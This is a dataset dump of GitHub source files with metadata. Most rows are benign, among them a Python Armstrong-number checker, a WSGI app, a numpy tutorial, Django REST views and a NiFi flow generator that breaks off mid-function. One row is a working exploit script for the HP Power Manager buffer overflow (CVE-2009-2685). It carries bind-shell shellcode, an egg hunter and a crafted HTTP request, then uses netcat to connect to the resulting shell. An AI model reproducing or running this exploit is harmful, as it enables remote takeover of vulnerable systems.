blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b28f8c53500179cf517b82a6b50fec1e424e9f82 | 70b51830c01c25c363b01a8ea18ef0cb177deb26 | /Check_Armstrong.py | 6b9fd076e974e1eadc8436762dabfd1cca74746c | [] | no_license | sy850811/PythonBasics | 2c3da546c91bc617773bd0b2b6f63c40e1d7ff44 | a953e45cbb9e19cfceb50925d1774899d41ca548 | refs/heads/main | 2023-07-13T18:17:38.536597 | 2021-08-27T19:35:51 | 2021-08-27T19:35:51 | 400,584,426 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | n = int(input())
def arm(n,m):
    """Return the sum of each base-10 digit of ``n`` raised to the power ``m``.

    For an m-digit number this is exactly the Armstrong-number check value,
    e.g. ``arm(153, 3) == 1**3 + 5**3 + 3**3 == 153``.
    """
    total = 0
    while n != 0:
        # Peel off the least-significant digit and accumulate digit**m.
        n, digit = divmod(n, 10)
        total += digit ** m
    return total
def countDigit(n):
    """Return the number of base-10 digits in ``n``.

    Note: 0 yields 0, matching the original loop (the body never runs).
    """
    digits = 0
    while n != 0:
        digits += 1
        n //= 10
    return digits
# Armstrong-number check: n is an Armstrong number when the sum of its
# digits, each raised to the digit-count of n, equals n itself.
# `n` is read from stdin at the top of the script.
if(n == arm(n,countDigit(n))):
    print("true")
else:
    print("false")
| [
"noreply@github.com"
] | noreply@github.com |
1287031215a5c2e62234091f3722019c1952123e | 3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d | /第三阶段笔记/x.py | 9a4ea86bafae287fe00bb41414f17d9df388718a | [] | no_license | qianpeng-shen/Study_notes | 6f77f21a53266476c3c81c9cf4762b2efbf821fa | 28fb9a1434899efc2d817ae47e94c31e40723d9c | refs/heads/master | 2021-08-16T19:12:57.926127 | 2021-07-06T03:22:05 | 2021-07-06T03:22:05 | 181,856,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | import time
HTML_ROOT_DIR="./static"
PYTHON_DIR="./wsgiPy"
class Application(object):
    """Minimal WSGI-style application.

    Serves files under ``HTML_ROOT_DIR`` for paths beginning with
    ``/static``, and dispatches every other path to the matching handler
    from ``urls`` — a sequence of ``(path, handler)`` pairs, where each
    handler is called as ``handler(env, set_headers)`` and returns the
    response body.
    """

    def __init__(self, urls):
        self.urls = urls

    def __call__(self, env, set_headers):
        # BUG FIX: the WSGI environ key is 'PATH_INFO' (was misspelled 'PARH_INFO',
        # so `path` was always the '/' default).
        path = env.get('PATH_INFO', '/')
        if path.startswith('/static'):
            # BUG FIX: a request path always starts with '/', so the prefix test
            # must be '/static' (was 'static', which never matched); the slice
            # path[7:] already assumed the 7-character '/static' prefix.
            file_name = path[7:]
            try:
                # BUG FIX: open the requested file under the static root — the
                # original opened the directory HTML_ROOT_DIR itself, which
                # always raises IOError.
                with open(HTML_ROOT_DIR + file_name, 'rb') as fd:
                    file_data = fd.read()
            except IOError:
                # BUG FIX: corrected the '404 not fount' typo in the status line.
                set_headers('404 not found', [])
                return "<h1>===没找到===<h1>"
            set_headers('200 OK', [])
            return file_data.decode('utf-8')
        else:
            for url, handler in self.urls:
                if path == url:
                    return handler(env, set_headers)
            # No registered handler matched the requested path.
            set_headers("404 not found", [])
            return "sorry url not found"
# BUG FIX: the original file defined `def show _time` (a space inside the
# identifier — a SyntaxError) three times over, while the `urls` table below
# referenced `show_time`, `say_hello`, `say_bye` and `yang`, none of which
# existed. Each route now gets its own valid handler; the bodies keep the
# original placeholder behavior (respond 200 and return the current time).

def show_time(env, set_headers):
    """Handler for '/time': respond 200 OK with the current time string."""
    set_headers("200 OK", [])
    return time.ctime()


def say_hello(env, set_headers):
    """Handler for '/hello' (placeholder body, mirroring the original copies)."""
    set_headers("200 OK", [])
    return time.ctime()


def say_bye(env, set_headers):
    """Handler for '/bye' (placeholder body, mirroring the original copies)."""
    set_headers("200 OK", [])
    return time.ctime()


def yang(env, set_headers):
    """Handler for '/xiaoyang' (was referenced by ``urls`` but never defined)."""
    set_headers("200 OK", [])
    return time.ctime()


urls = [
    ('/time', show_time),
    ('/hello', say_hello),
    ('/bye', say_bye),
    ("/xiaoyang", yang)
]
app=Application(urls)
| [
"shenqianpeng@chengfayun.com"
] | shenqianpeng@chengfayun.com |
c0409e2f1ebcd0362d83e57e190ccb744b8b61a9 | 7e736381f5cc651afe1df8ef21a54c9a0a42e8a4 | /svjconesizestudy/logger.py | fdb3d79624d1ceaa30d1d8a7df59c5bebc4b9280 | [
"BSD-3-Clause"
] | permissive | tklijnsma/svjconesizestudy | dd5e94bf847244e974f80bba277c0d3e2a44b87d | 5cd54d574b9bd086f7f033ed4f3fa365d2141165 | refs/heads/master | 2021-05-24T11:18:59.260313 | 2020-04-06T15:15:04 | 2020-04-06T15:15:04 | 253,535,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | import logging
# ANSI escape sequences used to colorize terminal output.
COLORS = {
    'yellow': '\033[33m',
    'red': '\033[31m',
}
RESET = '\033[0m'


def colored(text, color=None):
    """Return *text* wrapped in the ANSI escape sequence for *color*.

    With ``color=None`` the text is returned unchanged.
    """
    if color is None:
        return text
    return COLORS[color] + text + RESET


def setup_logger(name='svjcs', fmt=None):
    """Create (or fetch) the logger called *name*.

    The first call for a given name installs a DEBUG-level stream handler
    whose format is a yellow, timestamped prefix followed by the message;
    subsequent calls simply return the already-configured logger.
    """
    if name in logging.Logger.manager.loggerDict:
        existing = logging.getLogger(name)
        existing.info('Logger %s is already defined', name)
        return existing
    if fmt is None:
        prefix = colored(
            '> {0}:%(levelname)8s:%(asctime)s:%(module)s:'.format(name),
            'yellow'
        )
        fmt = logging.Formatter(
            fmt=prefix + ' %(message)s',
            datefmt='%Y-%m-%d %H:%M:%S'
        )
    handler = logging.StreamHandler()
    handler.setFormatter(fmt)
    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)
    logger.addHandler(handler)
    return logger
| [
"klijnsma@fnal.gov"
] | klijnsma@fnal.gov |
f5754099ff2905c976d9a0af1a23d58ea7433e21 | 84072a7c11babfdc33e7496647eb73fb46f3313b | /09_numpy_intro.py | 7d6547a8d2c13d6016d9518fd6bb26c5dcd047a7 | [] | no_license | jeffreyleeon/python-tutorials | 803bc47a5105221c5dc074eaea674dda918e1b88 | bb52ce26fb88b00944c0121809e35e4d5e0c9878 | refs/heads/master | 2021-01-21T10:22:09.535265 | 2017-03-19T04:16:30 | 2017-03-19T04:16:30 | 83,416,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | '''
Introduction to numpy library
Using the technic learnt in 08_using_built_in_library.py to import numpy, use functions in numpy
Documentation from numpy quick starter: https://docs.scipy.org/doc/numpy-dev/user/quickstart.html
- array
- arange
- shape
- zeros
- ones
- empty
'''
# import the numpy library
import numpy
# To create an array, we use numpy.array function, and provide a list
array = numpy.array([1, 2, 3, 4])
print('Array created from numpy.array([1, 2, 3, 4]): ')
print(array) # [1 2 3 4]
print()
# To create array using arange function
# .arange function can create array with n items, starting from 0 to n-1
array = numpy.arange(10)
print('Array created from numpy.arange(10): ')
print(array) # [0 1 2 3 4 5 6 7 8 9]
print()
# .arange function can also create an array by providing begin value, end value, step value
array = numpy.arange(0, 100, 5) # 0 is begin value; 100 is end value(exclusive), 5 is step value
print('Array created from numpy.arange(0, 100, 5): ')
print(array) # [ 0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95]
print()
print('The shape of the array is: ', array.shape) # (20, )
print()
# Create an array of 15 items and convert it into a 3*5 MATRIX using .reshape function
array = numpy.arange(15)
print('Array created from numpy.arange(15): ')
print(array) # [0 1 2 3 4 5 6 7 8 9 10 11 12 13 14]
print()
matrix = array.reshape(3, 5)
print('matrix created from array.reshape(3, 5): ')
print(matrix)
'''
[
[ 0 1 2 3 4]
[ 5 6 7 8 9]
[10 11 12 13 14]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (3, 5), 3 rows 5 columns
print()
matrix = array.reshape(5, 3)
print('matrix created from array.reshape(5, 3): ')
print(matrix)
'''
[
[ 0 1 2]
[ 3 4 5]
[ 6 7 8]
[ 9 10 11]
[12 13 14]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (5, 3), 5 rows 3 columns
print()
# numpy can also create a matrix with .zeros .ones .empty functions
matrix = numpy.zeros((4, 4))
print('matrix created from numpy.zeros((4, 4)): ')
print(matrix)
'''
[
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (4, 4), 4 rows 4 columns
print()
# .ones
matrix = numpy.ones((2, 3))
print('matrix created from numpy.ones((2, 3)): ')
print(matrix)
'''
[
[ 1. 1. 1.]
[ 1. 1. 1.]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (2, 3), 2 rows 3 columns
print()
# .empty
matrix = numpy.empty((3, 3))
print('matrix created from numpy.empty((3, 3)): ')
print(matrix)
'''
[
[ 4.94065646e-324 9.88131292e-324 1.48219694e-323]
[ 1.97626258e-323 2.47032823e-323 2.96439388e-323]
[ 3.45845952e-323 3.95252517e-323 4.44659081e-323]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (3, 3), 3 rows 3 columns
print()
| [
"jeffreyleeon@gmail.com"
] | jeffreyleeon@gmail.com |
4b227af594df82233bdffce71409ee9b902abd9e | 774fccd6bb2369d9d46fb448649ebe68b81542f7 | /my_env/bin/pip3 | 938341b06d6266d4e836ea1d059b8d48a891411e | [] | no_license | lyf0214/mysite | 3b49a0d1fb356e1a994c8cb9c3601bcb978af519 | 40a3ec7d499412fc87e8412426b0146878c8ad93 | refs/heads/master | 2020-03-24T07:01:44.409449 | 2018-07-27T11:25:35 | 2018-07-27T11:25:35 | 142,550,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | #!/Users/shiny/my_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"shiny@AppledeMacBook-Pro-3.local"
] | shiny@AppledeMacBook-Pro-3.local | |
cb02f43cde2d805ac8b14cabc69256dfad851d6a | fec36e7493a78575cd0320bf31c5080649863a06 | /src/views/feature_value/list.py | 2294b96b083b882991877221f5e144dc233b810e | [] | no_license | teimurjan/eye8-backend | 6f44e830dd17dcac8b23acc3b66b9918357f643b | bf0a4c894a5b3770fada269d8b4d7d72367ab1ba | refs/heads/master | 2023-06-30T01:34:38.358903 | 2021-06-23T10:06:29 | 2021-06-23T10:06:29 | 273,144,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
    """List (GET) and create (POST) endpoints for feature values."""

    def __init__(
        self,
        validator: CreateFeatureValueDataValidator,
        service: FeatureValueService,
        serializer_cls: Type[FeatureValueSerializer],
    ):
        super().__init__(validator)
        self._service = service
        self._serializer_cls = serializer_cls

    def _serialize_item(self, feature_value, language):
        """Serialize one feature value (with its feature type) for *language*."""
        return (
            self._serializer_cls(feature_value)
            .in_language(language)
            .with_serialized_feature_type()
            .serialize()
        )

    def get(self, request):
        """Return the feature-value list, paginated when the request asks for it."""
        meta = None
        pagination_data = self._get_pagination_data(request)
        if pagination_data:
            feature_values, count = self._service.get_all(
                offset=pagination_data["offset"], limit=pagination_data["limit"]
            )
            meta = self._get_meta(
                count, pagination_data["page"], pagination_data["limit"]
            )
        else:
            feature_values, _ = self._service.get_all()
        # raw_intl=1 requests untranslated (all-language) payloads.
        language = None if request.args.get("raw_intl") == "1" else request.language
        serialized = [self._serialize_item(fv, language) for fv in feature_values]
        return {"data": serialized, "meta": meta}, OK_CODE

    def post(self, request):
        """Validate the request body and create a new feature value."""
        try:
            valid_data = self._validate(request.get_json())
            feature_value = self._service.create(valid_data, user=request.user)
            payload = (
                self._serializer_cls(feature_value)
                .with_serialized_feature_type()
                .serialize()
            )
            return {"data": payload}, OK_CODE
        except self._service.FeatureTypeInvalid:
            raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
"teymurgg321@gmail.com"
] | teymurgg321@gmail.com |
cf95a73677140afefa5be34f07f063779c6b72bb | 0a5add05aad61dd2aa8ff366969f66d6a7f8c42c | /main/views.py | dd31373af50367de5becd8c4f01b11e832556ad4 | [] | no_license | PY312/nco | ae3584ee94fd5c6f23a9acbaadea411073ddac11 | 6374630f608e96d40652ced37224e253eebd89f2 | refs/heads/master | 2023-07-17T21:08:33.419856 | 2021-09-08T13:54:25 | 2021-09-08T13:54:25 | 404,366,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | from django.shortcuts import render
from .models import News, ImageNews
from .serializers import NewsListSerializer, NewsItemSerializer
from rest_framework import generics
from rest_framework.pagination import PageNumberPagination
# Create your views here.
class NewsListApiView(generics.ListAPIView):
    """Read-only, page-number-paginated list endpoint over all News rows."""
    queryset = News.objects.all()
    serializer_class = NewsListSerializer
    pagination_class = PageNumberPagination
class NewsItemApiView(generics.RetrieveAPIView):
    """Retrieve a single News row, looked up by the ``id`` URL kwarg."""
    queryset = News.objects.all()
    serializer_class = NewsItemSerializer
    lookup_field = 'id'
| [
"83508520+PY312@users.noreply.github.com"
] | 83508520+PY312@users.noreply.github.com |
458616bff6eea889f3db88f7bced7ffe0e0a3235 | 67c7bd48588eab5faede849b89501106756a7447 | /HP_Power_Manager_bof .py | 6b244529caad2bb8eb8ae5dce66434fe2ef4f87a | [] | no_license | sharmaharjeet92/scripts | 0df53153823fa781b719b8169fe3d3561e9c90ad | e1f75703cf0b5a02cd9267e88da171e8a8518267 | refs/heads/master | 2020-04-05T10:23:23.805770 | 2020-03-04T09:51:25 | 2020-03-04T09:51:25 | 156,796,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,740 | py | #!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Windows 7 Ultimate,based on ExploitDB Exploit 10099 developed by Matteo Memelli ryujin Matteo Memelli ryujin __A-T__ offensive-security.com
#Tweaked by Harjeet Sharma
# This Exploit use the concept of EGG Hunter as buffer size is small,
# Egg Hunter technique will inject small shell code then this small shell code will search for our large payload/shellcode.
#More Info for this can be found at https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
#https://security.stackexchange.com/questions/173674/buffer-overflow-doesnt-have-enough-space-for-exploit-after-being-crashed
import sys
from socket import *
import time
import os
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "May the force be with you...."
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: hp.py <remote-ip> "
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
#msfvenom -p windows/shell_bind_tcp LHOST=X.X.X.X LPORT=1234 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" x86/alpha_mixed --platform windows -f python
# Size of this payload is 352 Bytes
#Adding TAG harjharj so egghunter can find it
egg="harjharj"
buf= egg
buf += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x93\x85\x8e\x92\x83\xee\xfc\xe2\xf4\x6f\x6d"
buf += "\x0c\x92\x93\x85\xee\x1b\x76\xb4\x4e\xf6\x18\xd5\xbe"
buf += "\x19\xc1\x89\x05\xc0\x87\x0e\xfc\xba\x9c\x32\xc4\xb4"
buf += "\xa2\x7a\x22\xae\xf2\xf9\x8c\xbe\xb3\x44\x41\x9f\x92"
buf += "\x42\x6c\x60\xc1\xd2\x05\xc0\x83\x0e\xc4\xae\x18\xc9"
buf += "\x9f\xea\x70\xcd\x8f\x43\xc2\x0e\xd7\xb2\x92\x56\x05"
buf += "\xdb\x8b\x66\xb4\xdb\x18\xb1\x05\x93\x45\xb4\x71\x3e"
buf += "\x52\x4a\x83\x93\x54\xbd\x6e\xe7\x65\x86\xf3\x6a\xa8"
buf += "\xf8\xaa\xe7\x77\xdd\x05\xca\xb7\x84\x5d\xf4\x18\x89"
buf += "\xc5\x19\xcb\x99\x8f\x41\x18\x81\x05\x93\x43\x0c\xca"
buf += "\xb6\xb7\xde\xd5\xf3\xca\xdf\xdf\x6d\x73\xda\xd1\xc8"
buf += "\x18\x97\x65\x1f\xce\xed\xbd\xa0\x93\x85\xe6\xe5\xe0"
buf += "\xb7\xd1\xc6\xfb\xc9\xf9\xb4\x94\x7a\x5b\x2a\x03\x84"
buf += "\x8e\x92\xba\x41\xda\xc2\xfb\xac\x0e\xf9\x93\x7a\x5b"
buf += "\xf8\x9b\xdc\xde\x70\x6e\xc5\xde\xd2\xc3\xed\x64\x9d"
buf += "\x4c\x65\x71\x47\x04\xed\x8c\x92\x97\x57\x07\x74\xf9"
buf += "\x95\xd8\xc5\xfb\x47\x55\xa5\xf4\x7a\x5b\xc5\xfb\x32"
buf += "\x67\xaa\x6c\x7a\x5b\xc5\xfb\xf1\x62\xa9\x72\x7a\x5b"
buf += "\xc5\x04\xed\xfb\xfc\xde\xe4\x71\x47\xfb\xe6\xe3\xf6"
buf += "\x93\x0c\x6d\xc5\xc4\xd2\xbf\x64\xf9\x97\xd7\xc4\x71"
buf += "\x78\xe8\x55\xd7\xa1\xb2\x93\x92\x08\xca\xb6\x83\x43"
buf += "\x8e\xd6\xc7\xd5\xd8\xc4\xc5\xc3\xd8\xdc\xc5\xd3\xdd"
buf += "\xc4\xfb\xfc\x42\xad\x15\x7a\x5b\x1b\x73\xcb\xd8\xd4"
buf += "\x6c\xb5\xe6\x9a\x14\x98\xee\x6d\x46\x3e\x6e\x8f\xb9"
buf += "\x8f\xe6\x34\x06\x38\x13\x6d\x46\xb9\x88\xee\x99\x05"
buf += "\x75\x72\xe6\x80\x35\xd5\x80\xf7\xe1\xf8\x93\xd6\x71"
buf += "\x47"
#Creating small egg Hunter with name "hunter" with tag "harj"
#tools/exploit/egghunter.rb -f python -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e harj -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x68\x61\x72\x6a\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#lets make a POST HTTP Request,Main Shellcode we will be injecting in User-Agent Field.
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + hunter + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,buf,HOST)
#Now we have the payload ready,lets go for kill
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Sent!"
print " Wait for few seconds,spawning the shell for you... "
time.sleep(30)
print "[*] Using netcat to connect %s over port 1234 " % HOST
os.system("nc -nv " + HOST +" 1234")
s.close()
| [
"noreply@github.com"
] | noreply@github.com |
21796ac535397c38f7262b1929fc6ae5dde8f84a | 2f87a8a49f4f26c36cbbfa6381bebb6b8dacc655 | /api_basic/urls.py | adbbb878dd0175a7a2830d1f092ad2c7d8b9e15b | [] | no_license | Shrav543/Django-rest | 63b537ef0a30b89e8aa846afdaa138d26dc36419 | d016570eb759607a1c5451f72bb97fd589a75384 | refs/heads/master | 2023-07-31T14:51:11.826234 | 2020-06-12T09:50:10 | 2020-06-12T09:50:10 | 271,763,114 | 0 | 0 | null | 2021-09-22T19:12:26 | 2020-06-12T09:43:30 | Python | UTF-8 | Python | false | false | 1,047 | py | from django.urls import path , include
#from .views import ArticleAPIVIEW, Article_DetailAPI ,GenericAPIView , ArticleViewSet
#from .views import ArticleViewSetGeneric
from .views import ArticleViewSetModel
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
#router.register('', ArticleViewSet, basename='article')
#router.register('article', ArticleViewSetGeneric ,basename='article')
router.register('',ArticleViewSetModel)
urlpatterns = [
# path('article/', views.article_list , name="api-basic-article"),
# path('detail/<int:pk>/',views.article_Detail , name ="api-basic-article-detail")
# path('article/', ArticleAPIVIEW.as_view()), #since we are using class we need to add .as_view()
# path('detail/<int:id>/',Article_DetailAPI.as_view()),
# path('generic/<int:id>/', GenericAPIView.as_view()),
# path('generic/', GenericAPIView.as_view()),
# path('viewset/',include(router.urls)),
#path('viewsetgeneric/',include(router.urls)),
path('viewsetmodel/', include(router.urls)),
]
| [
"er.gauravsharma543@gmail.com"
] | er.gauravsharma543@gmail.com |
54fa9a542b276fcf3b2261c362e3d446b891570a | ce9c2603167e1b30b222afd5206ac7fa31d19a77 | /imctools/io/errors.py | dfd219570e7d15482e270e2b063e25a27abc5522 | [
"MIT"
] | permissive | BodenmillerGroup/imctools | 6d07036045a6361e17811d8f675eab01f34ffade | 361e49f3e0de4cf9c58c3b6d1024feacd2855d98 | refs/heads/master | 2022-05-01T23:29:49.302686 | 2022-03-31T09:58:01 | 2022-03-31T09:58:01 | 68,657,395 | 21 | 14 | MIT | 2022-03-31T09:58:02 | 2016-09-20T00:16:24 | Python | UTF-8 | Python | false | false | 75 | py | class AcquisitionError(Exception):
"""An error with IMC acquisition"""
| [
"anton.rau@gmail.com"
] | anton.rau@gmail.com |
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /2.Jump_to_python/Python07.py | 99deebb9aeec73d60845d030c9ca5481a5b33cec | [] | no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # 모듈화 + 패키지
# + 모듈가져오기, 테스트 코드 배치 , 모듈가져오기 , 패키지 사용
# 모듈
# 함수나 변수 또는 클래스를 모아 놓은 파일이다.
# => 확장자가.py파일
# mod.py,__init__.py,p1.py, p2.py,...
# import 모듈이름
# 모듈이름.함수 모듈이름을 안쓰려면 -> from 모듈이름 import 모듈함수
# from mod1 import* -> * (모든것)을 의미
# 모듈화의 대상 => 변수, 함수, 클래스 <= 요소를 가져다 내것 처럼 사용가능
# 패키지
# 유사한 기능 끼리 묶어둔 디렉토리 ,유틸리티 , 통신 , gui등등 모아둔것
# 패키지 폴더 내에 __init__.py 이 파일은 하위 호환을 위해서 python3.3이하에서는 모두 사용한다.
# 그리고, __init__.py는 곧 해당 패키지 자체를 의미한다
#-------------------------------
# from 패키지.패키지....모듈\ import 변수,함수,클레스(필요한것들 열거)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from 패키지.패키지 \ import 변수, 함수, 클래스
# 경로상 마지막 패키지(디렉토리)안에 있는 __init__.py에서 모듈을 가져온다
from a.b import PI2 as pi2 # PI2 -> pi2 이름 변경
print(pi2)
# 패키지명은 절대로 .들어가면 않된다!!
# 모듈명도 절대로 .들어가면 않된다!!
from a import PI3
print(PI3)
# 별칭 => 이름이 너무 길어서라든지, 이름 변경을 해서 사용하고 싶다면
# 원래이름 as 별칭
from a import PI3 as pi
print(pi)
# 가져올 모듈이 너무 많다. 다 가져왔으면 좋겟다 => *
# 하위 호환을 위해서는
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# import만 사용시
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# 모듈을 가져온다는 것은 해당 모듈을 실행한다라고 봐도 무방하다->메모리 적제를 해야하니
# 내가 만든 모듈같은 경우 의도하지 않은 코드가 실행될수 있다
# => 테스트 할려고 만든 코드는 모듈 가져오기 수행시 실제로 구동되면 않된다
# => 이런 코드 처리가 필요하다 => __name__을 이용하여 처리 한다
# __name__을 사용하는 모듈을 직접 구동하면 "__main__"으로 나오고,
# 모듈로 사용되면(즉, 다른 모듀이 가져다 쓰면) "모듈명"으로 나온다
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__) | [
"sun4131@gmail.com"
] | sun4131@gmail.com |
c1245a82f33ae2d0ae87149125edee011c5be097 | f8d929261ec8cf6671fc5725b91a1b26423d2dbc | /Account_app/migrations/0001_initial.py | 5817ac8eea3e2c5dcc1866c072c9eb6ea816ceda | [] | no_license | trak2018z/Web_System-tr | e2091d6e4ae7141a9ebd4a764bc7d33752f50642 | 92a144580144e491429bc82b517ff22566318a3b | refs/heads/master | 2021-05-09T05:28:32.304547 | 2018-01-08T17:56:29 | 2018-01-08T17:56:29 | 119,310,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-06 12:01
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.IntegerField(default=0)),
('street', models.CharField(default='', max_length=200)),
('city', models.CharField(default='', max_length=200)),
('post_code', models.CharField(default='', max_length=6)),
('company', models.CharField(blank=True, max_length=300)),
('company_city', models.CharField(blank=True, max_length=200)),
('company_street', models.CharField(blank=True, max_length=200)),
('company_post_code', models.CharField(blank=True, max_length=6)),
('company_nip', models.IntegerField(default=0)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"tomel23@wp.pl"
] | tomel23@wp.pl |
0d555fa2eb97724fcc5f3910b125fe5a55b9cea4 | 2f95c4762e0d57e97da6c291228761e3a8c8e938 | /vvdatalab_nifi_flow_generator/models/io_ports/create_io_group.py | d1b0d75d5ab45c4db63aab072544122f16ea43cc | [] | no_license | felipelobasrocha/nifi_flow_generator | 9964050a6834fb15434f2f8ece16b1d26afe192c | 6dea7c27250e3447e5febf6a6e55625f413ec62c | refs/heads/master | 2020-08-24T22:00:43.115585 | 2019-10-22T21:40:34 | 2019-10-22T21:40:34 | 216,914,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,480 | py | from nipyapi import canvas, nifi
from vvdatalab_nifi_flow_generator import models
from vvdatalab_nifi_flow_generator.models.io_ports.create_input_port import CreateInputPort
from vvdatalab_nifi_flow_generator.models.io_ports.create_output_port import CreateOutputPort
CreateProcessGroup = models.CreateProcessGroup
CreateLocation = models.CreateLocation
LocationType = models.LocationType
class CreateIOGroup:
    """Builds a NiFi 'IOProcessGroup' child group and optionally wires it
    to surrounding processors via input/output ports."""

    def create(self, process_group, processor_to_connect=None, processor_from_connect=None, connect_to=None,
               connect_from=None, component_location=None):
        """Create the IO process group inside *process_group*.

        An input port is created and connected only when both
        *processor_to_connect* and *connect_to* are given; likewise an
        output port requires both *processor_from_connect* and
        *connect_from*. *component_location* is a zero-arg callable
        yielding (x, y) canvas coordinates; it defaults to a fixed spot.
        Returns the newly created process group.
        """
        # FIX: identity comparisons with None (`is` / `is not`) instead of
        # `==` / `!=`, per PEP 8; behavior is unchanged for these arguments.
        if component_location is None:
            component_location = lambda: (2000.00, 400.0)
        io_process_group = CreateProcessGroup(
            process_group, 'IOProcessGroup', component_location()).create()
        # Re-bind to a zigzag location generator for the ports placed below.
        component_location = CreateLocation(x=0.0, y=0.0, type=LocationType.ZIGZAG).create
        if processor_to_connect is not None and connect_to is not None:
